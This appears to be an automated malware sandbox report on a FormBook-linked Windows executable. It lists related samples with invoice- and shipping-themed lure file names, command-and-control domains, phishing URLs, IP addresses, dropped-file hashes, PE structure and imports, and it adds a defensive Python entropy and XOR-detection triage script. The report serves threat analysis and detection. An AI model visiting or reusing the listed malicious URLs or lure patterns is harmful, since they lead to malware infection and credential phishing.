13.248.169.48 | NEW.RFQ00876.pdf.exe | malicious | FormBook | www.krshop.shop/5p01/
161.97.142.144 | RFQ3978 39793980.pdf.exe | malicious | FormBook | www.030002350.xyz/1a7n/
161.97.142.144 | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | www.070001813.xyz/gn0y/
161.97.142.144 | PO2412010.exe | malicious | FormBook | www.070002018.xyz/6m2n/
161.97.142.144 | New Purchase Order.exe | malicious | FormBook | www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
161.97.142.144 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.070002018.xyz/6m2n/
161.97.142.144 | Order MEI PO IM202411484.exe | malicious | FormBook | www.030002613.xyz/xd9h/
161.97.142.144 | Documents.exe | malicious | FormBook, PureLog Stealer | www.030002449.xyz/cfqm/
161.97.142.144 | PAYMENT_TO_NFTC_(CUB)_26-11-24.doc | malicious | DarkTortilla, FormBook | www.070001955.xyz/7zj0/
161.97.142.144 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.54248711.xyz/jm2l/
161.97.142.144 | IETC-24017.exe | malicious | FormBook, PureLog Stealer | www.030002613.xyz/xd9h/
15.204.67.7 | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | www.madhf.tech/0mwe/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.030002128.xyz | AWB_NO_907853880911.exe | malicious | FormBook | 161.97.142.144
www.030002128.xyz | Shipping documents..exe | malicious | FormBook | 161.97.142.144
www.quicktraze.website | AWB_NO_907853880911.exe | malicious | FormBook | 209.74.64.58
www.sortcouponspot.shop | AWB_NO_907853880911.exe | malicious | FormBook | 104.21.90.177
www.xphone.net | AWB_NO_907853880911.exe | malicious | FormBook | 13.248.169.48
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HP-INTERNET-ASUS | arm5.elf | malicious | Mirai | 156.153.204.120
HP-INTERNET-ASUS | ppc.elf | malicious | Mirai | 156.153.33.1
HP-INTERNET-ASUS | mpsl.elf | malicious | Mirai | 156.153.137.2
HP-INTERNET-ASUS | https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg== | malicious | Unknown | 15.204.241.30
HP-INTERNET-ASUS | la.bot.m68k.elf | malicious | Mirai | 15.167.98.235
HP-INTERNET-ASUS | la.bot.powerpc.elf | malicious | Mirai | 15.143.29.26
HP-INTERNET-ASUS | la.bot.mipsel.elf | malicious | Mirai | 15.145.76.148
HP-INTERNET-ASUS | la.bot.arm7.elf | malicious | Mirai | 15.244.27.210
HP-INTERNET-ASUS | XUTLbT1Wd1.exe | malicious | Unknown | 15.235.136.234
HP-INTERNET-ASUS | XUTLbT1Wd1.exe | malicious | Unknown | 15.235.136.234
AMAZON-02US | http://home45insurance.blogspot.com | malicious | Unknown | 18.194.154.81
AMAZON-02US | https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 52.57.45.42
AMAZON-02US | AzureConnect.exe | malicious | CobaltStrike | 54.230.104.116
AMAZON-02US | main.exe | malicious | AsyncRAT | 3.142.129.56
AMAZON-02US | AsyncClient.exe | malicious | AsyncRAT | 3.70.228.168
AMAZON-02US | image logger.exe | malicious | AsyncRAT | 18.141.204.5
AMAZON-02US | https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188e | malicious | Unknown | 13.226.2.73
AMAZON-02US | ppc.elf | malicious | Mirai | 54.171.230.55
AMAZON-02US | arm5.elf | malicious | Gafgyt, Mirai, Okiru | 34.243.160.129
AMAZON-02US | INV_NE_02_2034388.exe | malicious | FormBook | 18.141.10.107
Africa-on-Cloud-ASZA | nshsh4.elf | malicious | Mirai | 156.228.141.227
Africa-on-Cloud-ASZA | b3astmode.arm.elf | malicious | Mirai | 156.228.63.47
Africa-on-Cloud-ASZA | arm5.elf | malicious | Mirai | 156.240.230.2
Africa-on-Cloud-ASZA | ppc.elf | malicious | Mirai | 156.246.3.216
Africa-on-Cloud-ASZA | mips.elf | malicious | Mirai | 156.246.97.104
Africa-on-Cloud-ASZA | sh4.elf | malicious | Mirai | 156.228.204.80
Africa-on-Cloud-ASZA | nshkarm7.elf | malicious | Mirai | 156.228.63.29
Africa-on-Cloud-ASZA | hax.spc.elf | malicious | Mirai | 156.228.63.77
Africa-on-Cloud-ASZA | hax.m68k.elf | malicious | Mirai | 156.228.141.216
Africa-on-Cloud-ASZA | hax.arm.elf | malicious | Mirai | 156.246.49.201
CONTABODE | payload-c17f7df6-cf80-43d5-8c60-eca90366debb.exe | malicious | Metasploit | 178.238.231.204
CONTABODE | RFQ3978 39793980.pdf.exe | malicious | FormBook | 161.97.142.144
CONTABODE | ORDER-401.exe | malicious | FormBook | 161.97.142.144
CONTABODE | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 161.97.142.144
CONTABODE | PO2412010.exe | malicious | FormBook | 161.97.142.144
CONTABODE | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 161.97.142.144
CONTABODE | Need Price Order No.17084 PARLOK.exe | malicious | FormBook | 161.97.168.245
CONTABODE | lgkWBwqY15.exe | malicious | FormBook | 161.97.168.245
CONTABODE | New quotation request.exe | malicious | FormBook | 161.97.168.245
CONTABODE | UPDATED CONTRACT.exe | malicious | FormBook | 161.97.168.245
No context
No context
Process: C:\Windows\SysWOW64\recover.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SC_TR11670000_pdf.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.993571632073203
Encrypted: true
SSDEEP: 6144:r/uDDG4SpQs0lpPfNlm1/oopBOx3xnMcMZo7BWkFCARDfFc:r/yDG4Spv0vPfCpoqBcMi7EwfS
MD5: E4198548F9D7BCD5883F0CD6F8BC5786
SHA1: FB426AD38C75F32A6E5571B3BF706FD3106D5223
SHA-256: 760D157BDCEDF86631EB7AFF57E606D5FFCA5E1D69B07280DD6ABEFF81E41D64
SHA-512: 6537DF82248CA4296E95386C23E1581FD7A8D6CFF856B77A0307BD4385AFFCECDB7C73F96EA53C195B7CCE5840F171D6BA39F2DF4B486F28D7FE9E6D7EC15599
Malicious: false
Reputation: low
                                                                        Preview:.....R028...X...n.2;...yKB...028E2CQHJA9R028E2CQHJA9R028E2C.HJA7M.<8.;.p.K..sdZQ6.3#'-3X?.QY+\,%h($. E\.,\c...aT=TW.H?IuHJA9R02AD;.l(-..2W..%U.K...2W.".m(-.#....%U..!)).2W.8E2CQHJAi.02tD3CrO..9R028E2C.HH@2S;28.6CQHJA9R02.Q2CQXJA9"428ErCQXJA9P02>E2CQHJA?R028E2CQ8NA9P028E2CSH..9R 28U2CQHZA9B028E2CAHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2C.</9MR02..6CQXJA9.428U2CQHJA9R028E2CqHJ!9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA
Process: C:\Users\user\Desktop\SC_TR11670000_pdf.exe
File Type: ASCII text, with very long lines (28686), with no line terminators
Category: dropped
Size (bytes): 28686
Entropy (8bit): 3.573777695419727
Encrypted: false
SSDEEP: 384:YJejrkc2+oeeZ6wPlWrqGhFOI5KJmJEcDoNlLIFa5JQqTN0/0DTYrLfaHhC:+ecVNeeQwPlWr6QJEcDoNe6b/nY3+C
MD5: BD3289098BF2094FD605AA8153B015CA
SHA1: B9C2E8AADB1AADCF64A8B5FCF9300391D86F8D4E
SHA-256: 5DB1956153D179D1A4BD5D946C3671AF48C604BD6735419CEE25B553C2F20A2D
SHA-512: 0247FBF8CD228C9355EDA4726E5FF841FB20B1DFADCC9AABCF33918CA6BC883E0C456E69167DC7FCFCE95219DBB6CDB6BC78BE1D2226ADDBB7A4C0CC14321448
Malicious: false
Reputation: low
Preview:
Process: C:\Users\user\Desktop\SC_TR11670000_pdf.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.993571632073203
Encrypted: true
SSDEEP: 6144:r/uDDG4SpQs0lpPfNlm1/oopBOx3xnMcMZo7BWkFCARDfFc:r/yDG4Spv0vPfCpoqBcMi7EwfS
MD5: E4198548F9D7BCD5883F0CD6F8BC5786
SHA1: FB426AD38C75F32A6E5571B3BF706FD3106D5223
SHA-256: 760D157BDCEDF86631EB7AFF57E606D5FFCA5E1D69B07280DD6ABEFF81E41D64
SHA-512: 6537DF82248CA4296E95386C23E1581FD7A8D6CFF856B77A0307BD4385AFFCECDB7C73F96EA53C195B7CCE5840F171D6BA39F2DF4B486F28D7FE9E6D7EC15599
Malicious: false
                                                                        Preview:.....R028...X...n.2;...yKB...028E2CQHJA9R028E2CQHJA9R028E2C.HJA7M.<8.;.p.K..sdZQ6.3#'-3X?.QY+\,%h($. E\.,\c...aT=TW.H?IuHJA9R02AD;.l(-..2W..%U.K...2W.".m(-.#....%U..!)).2W.8E2CQHJAi.02tD3CrO..9R028E2C.HH@2S;28.6CQHJA9R02.Q2CQXJA9"428ErCQXJA9P02>E2CQHJA?R028E2CQ8NA9P028E2CSH..9R 28U2CQHZA9B028E2CAHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2C.</9MR02..6CQXJA9.428U2CQHJA9R028E2CqHJ!9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA
Process: C:\Users\user\Desktop\SC_TR11670000_pdf.exe
File Type: data
Category: dropped
Size (bytes): 9714
Entropy (8bit): 7.594779982720446
Encrypted: false
SSDEEP: 192:M7U22a8TDxRMGoftt5E7Z2AA3W0abwNb09W2X/wzxGQl/7Yt1IrxD7bHRA9eL:M7iJPHoftt5+ZBbwNbkozdYMNbRA9U
MD5: AB8B3C56FA613D1FC8B5C508765CE882
SHA1: 2C26F887BF6D3264D6D9C5F093930CEAD4E6DCC3
SHA-256: 3DBB5E14081D6D5D08D26039D06F3EEA5FEC1A3A1B68E73715BC90F601D8897C
SHA-512: EE2FD955DAFE63A2866E0A62633FDFE434FD1CBC12F41DC03FF400167EDEF11E227A1B7659865311513E1877FBF3857E8D4CBA69F8801E14B71ACBEF4F0F6CF7
Malicious: false
                                                                        Preview:EA06..p..M..Y......f....qo.\'.....p.L.....k7..&...:a6.N'3I..io....].......K........|...o..o.M.......8.....9.[.30....3....2.Z..k9..6.@.o.l..\......g.9.L.w...\....N..3I.........9..&....r.'.Y...c ....An.H.......F.3<..\..6....`....f@...x..j....Br.....[..0..n3.|.n...\f@5_..h....f.5_..p.U..m.5_....U..n@5_..`.U..@5\..>3...M.^.n.Z..k6.z..o6......@......y..G../Z.M. .....jr.....n.u....$.`./.o8...f.G_T.......@>_.......zk5....i..... ...................`.M..`... ...p...@....'.4...{>K|..c.Mm.@..[..._..p......>Kx#G.o..3|w...G.4..&@8_..kp..i|w.....p.h............7.MnsK....M...;..8..f.0.L..79..f..+..ff6....6.N. ...f...E...Y....3.I.............w............2p....<d....,vb...t....N@!+..'& ....,fo2..n6........r.2.X...c3k..es.Y.!...Gf@....,f.9.N.`. .#7.....c.0.....y..p.h.s.....,vf...|..t.L@...40.....f.....&3....4..@.6.-..p..S....2...S0.N.@.;5.`...9.......k8.....c.P..\.3.wx.....vl........E......y6....p.c3....4..b.!....F ....B5p.L.3........vn.....f....r...B3P.....;8.X...n.............g.....
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.1297433415067
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SC_TR11670000_pdf.exe
File size: 1'179'136 bytes
MD5: 1ead28dad1fae4a2478c61d096a3f162
SHA1: 503a22eb5ae11321abbce439d4548b037281018d
SHA256: 62cb069bd0351753a2cca2186257049a8ca4b5eaf3fbc9ef37080d9ec3f58f24
SHA512: db8cef63130b7694d0bb866d4ae9c9ec4a3527b93a4027c39d1f8f961d0396444e15636407891a23475e2e77f346c383baf821da6d4c208aa0987e47cb5e91ad
SSDEEP: 24576:cAHnh+eWsN3skA4RV1Hom2KXMmHalgcMhzcVETYYPQQxQE5:7h+ZkldoPK8Yalg3hIEXxP
TLSH: 8E45AD0273D1C036FFABA2739B6AF24156BC79254133852F13981DB9BD701B2276E663
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                        Icon Hash:aaf3e3e3938382a0
                                                                        Entrypoint:0x42800a
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x674D26E4 [Mon Dec 2 03:17:56 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                        Instruction
                                                                        call 00007F6008B9235Dh
                                                                        jmp 00007F6008B85114h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [esp+10h]
                                                                        mov ecx, dword ptr [esp+14h]
                                                                        mov edi, dword ptr [esp+0Ch]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F6008B8529Ah
                                                                        cmp edi, eax
                                                                        jc 00007F6008B855FEh
                                                                        bt dword ptr [004C41FCh], 01h
                                                                        jnc 00007F6008B85299h
                                                                        rep movsb
                                                                        jmp 00007F6008B855ACh
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F6008B85464h
                                                                        mov eax, edi
                                                                        xor eax, esi
                                                                        test eax, 0000000Fh
                                                                        jne 00007F6008B852A0h
                                                                        bt dword ptr [004BF324h], 01h
                                                                        jc 00007F6008B85770h
                                                                        bt dword ptr [004C41FCh], 00000000h
                                                                        jnc 00007F6008B8543Dh
                                                                        test edi, 00000003h
                                                                        jne 00007F6008B8544Eh
                                                                        test esi, 00000003h
                                                                        jne 00007F6008B8542Dh
                                                                        bt edi, 02h
                                                                        jnc 00007F6008B8529Fh
                                                                        mov eax, dword ptr [esi]
                                                                        sub ecx, 04h
                                                                        lea esi, dword ptr [esi+04h]
                                                                        mov dword ptr [edi], eax
                                                                        lea edi, dword ptr [edi+04h]
                                                                        bt edi, 03h
                                                                        jnc 00007F6008B852A3h
                                                                        movq xmm1, qword ptr [esi]
                                                                        sub ecx, 08h
                                                                        lea esi, dword ptr [esi+08h]
                                                                        movq qword ptr [edi], xmm1
                                                                        lea edi, dword ptr [edi+08h]
                                                                        test esi, 00000007h
                                                                        je 00007F6008B852F5h
                                                                        bt esi, 03h
                                                                        Programming Language:
                                                                        • [ASM] VS2013 build 21005
                                                                        • [ C ] VS2013 build 21005
                                                                        • [C++] VS2013 build 21005
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2013 UPD5 build 40629
                                                                        • [RES] VS2013 build 21005
                                                                        • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x556d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11e000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x556d8 | 0x55800 | 4e23b2c37d293c24565dc93788680cf6 | False | 0.9229800575657895 | data | 7.884330399558395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11e000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd07b8 | 0x4c99e | data | | | 1.000337839991331
RT_GROUP_ICON | 0x11d158 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11d1d0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11d1e4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11d1f8 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11d20c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11d2e8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
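The section and resource tables above carry the three static metrics that point at where the packed content lives: .rsrc has entropy 7.88 against 5.8 to 6.8 for the code sections, and the 0x4c99e-byte RT_RCDATA resource has a ZLIB complexity above 1.0 (it does not compress at all), which makes it the obvious place to look for the embedded script the report's AutoIt signature refers to. The following is an added example, not Joe Sandbox code; it reimplements "Entropy (8bit)", "ZLIB Complexity" and a single-byte-XOR version of the "Xored PE" check and applies triage thresholds to them. The thresholds are assumptions, and the three blobs at the bottom are constructed here rather than taken from the sample.

```python
"""Reproduce three per-section metrics from the report above (Entropy (8bit),
ZLIB Complexity and the Xored PE check) and apply triage thresholds to them.
Added example, not Joe Sandbox code. The thresholds are assumptions, and the
three blobs at the bottom are constructed here; they are not bytes from the
sample."""
import hashlib
import math
import zlib
from typing import List, Optional

DOS_STUB = b"This program cannot be run in DOS mode"


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """zlib-compressed size divided by raw size. Near or above 1.0 means the bytes
    are already compressed or encrypted; the RT_RCDATA resource above scores 1.0003."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def xored_pe_key(data: bytes) -> Optional[int]:
    """Find a PE image hidden under a single-byte XOR by searching for the DOS stub
    string under every key. Returns the key (0 for an unencoded PE) or None."""
    for key in range(256):
        needle = bytes(b ^ key for b in DOS_STUB)
        if needle in data:
            return key
    return None


def triage_blob(name: str, data: bytes,
                entropy_threshold: float = 7.0,
                complexity_threshold: float = 0.95) -> List[str]:
    """Findings for one section or resource body; an empty list means nothing notable."""
    findings = []
    e = entropy8(data)
    c = zlib_complexity(data)
    if e >= entropy_threshold:
        findings.append(f"{name}: entropy {e:.2f} >= {entropy_threshold} (packed or encrypted?)")
    if c >= complexity_threshold:
        findings.append(f"{name}: zlib complexity {c:.3f} (already compressed or encrypted)")
    key = xored_pe_key(data)
    if key is not None:
        findings.append(f"{name}: embedded PE found, XOR key 0x{key:02x}")
    return findings


def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler made of chained SHA-256 digests (constructed)."""
    out = bytearray()
    i = 0
    while len(out) < n:
        out += hashlib.sha256(i.to_bytes(4, "little")).digest()
        i += 1
    return bytes(out[:n])


# Constructed inputs: a zero-filled section, a blob with the profile of the
# sample's .rsrc / RT_RCDATA, and a mostly empty blob hiding a PE header XORed with 0x5A.
ZERO_SECTION = b"\x00" * 4096
ENCRYPTED_BLOB = pseudo_random(4096)
XORED_BLOB = (b"\x00" * 512
              + bytes(b ^ 0x5A for b in b"MZ\x90\x00" + DOS_STUB)
              + b"\x00" * 512)

if __name__ == "__main__":
    for name, blob in ((".data", ZERO_SECTION), ("RT_RCDATA", ENCRYPTED_BLOB), ("overlay", XORED_BLOB)):
        print(f"{name:10s} entropy={entropy8(blob):.3f} zlib={zlib_complexity(blob):.3f}")
        for finding in triage_blob(name, blob):
            print("   ", finding)
```

Entropy alone does not separate compressed from encrypted data, and the XOR scan only covers the single-byte case; the point of the zlib ratio is that a resource which is both high-entropy and incompressible has already been transformed once, so the next step is to carve it and look for the packer's or interpreter's own header rather than to run more statistics on it.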
DLL | Imports
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
